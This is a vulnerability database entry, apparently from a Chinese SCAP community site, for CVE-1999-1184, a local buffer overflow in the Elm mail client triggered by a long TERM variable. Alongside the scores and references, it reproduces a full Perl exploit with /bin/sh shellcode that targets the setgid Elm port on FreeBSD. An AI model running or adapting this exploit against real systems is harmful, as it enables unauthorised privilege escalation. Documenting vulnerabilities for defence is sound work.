CVE-1999-1184
CVSS4.6
发布时间 :1997-05-13 00:00:00
修订时间 :2016-10-17 22:02:00
NMCOE    

[原文]Buffer overflow in Elm 2.4 and earlier allows local users to gain privileges via a long TERM environmental variable.


[CNNVD]Elm缓冲区溢出漏洞(CNNVD-199705-012)

        Elm 2.4及早期版本存在缓冲区溢出漏洞。本地用户可以通过一个超长的环境变量获得权限。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:elm_development_group:elm:2.4
cpe:/a:elm_development_group:elm:2.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1184
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1184
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199705-012
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=87602167420967&w=2
(UNKNOWN)  BUGTRAQ  19970513
http://marc.info/?l=bugtraq&m=87602167420970&w=2
(UNKNOWN)  BUGTRAQ  19970514 Re: ELM overflow

- 漏洞信息

Elm缓冲区溢出漏洞
中危 缓冲区溢出
1997-05-13 00:00:00 2005-10-20 00:00:00
本地  
        Elm 2.4及早期版本存在缓冲区溢出漏洞。本地用户可以通过一个超长的环境变量获得权限。

- 公告与补丁

        

- 漏洞信息 (22836)

Elm 2.3/2.4 Local TERM Environment Variable Buffer Overrun Vulnerability (EDBID:22836)
linux local
1997-05-13 Verified
0 kokanin
N/A [点击下载]
source: http://www.securityfocus.com/bid/8030/info

A buffer overrun has been discovered in Elm. The problem occurs due to insufficient bounds checking performed before copying user-supplied data into an internal memory buffer. Specifically, a TERM environment variable containing excessive data would cause a buffer within Elm to be overrun.

As Elm is installed setgid on some systems, the exploitation of this vulnerability could potentially allow for the elevation of local privileges.

# DSR-korean-elm.pl - kokaninATdtors.net vs. /usr/ports/korean/elm
# offset, retaddr and shellcode is for my FreeBSD 4.7-RELEASE, YMMV
# reinventing the wheel, http://www.insecure.org/sploits/elm.curses.overflow.html
# shellcode by zillionATsafemode.org
# ko-elm-2.4h4.1      ELM Mail User Agent, patched for Korean E-Mail
# elm is setgid 'bin' 

$len = 512;
$ret = 0xbfbffd68;
$nop = "\x90";
$offset = 0;
$shellcode = 	"\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
		"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
		"\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
              
if (@ARGV == 1) {
    $offset = $ARGV[0];
}
  
for ($i = 0; $i < ($len - length($shellcode)); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
$new_ret = pack('l', ($ret + $offset));
local($ENV{'EGG'}) = $buffer; 
local($ENV{'TERM'}) = $new_ret x 12; 
exec("elm");		

- 漏洞信息

2198
FreeBSD Korean Elm Port Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A flaw in the Korean port of Elm 2.4h4.1 on FreeBSD allows a malicious local user to overflow the buffer and gain access to the system as the bin user. This flaw occurs because the software does not handle certain environment variables correctly.

- 时间线

2003-06-23 2003-06-23
2003-06-23 Unknow

- 解决方案

Limit access to system to trusted users only or remove Elm and use another mail application.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站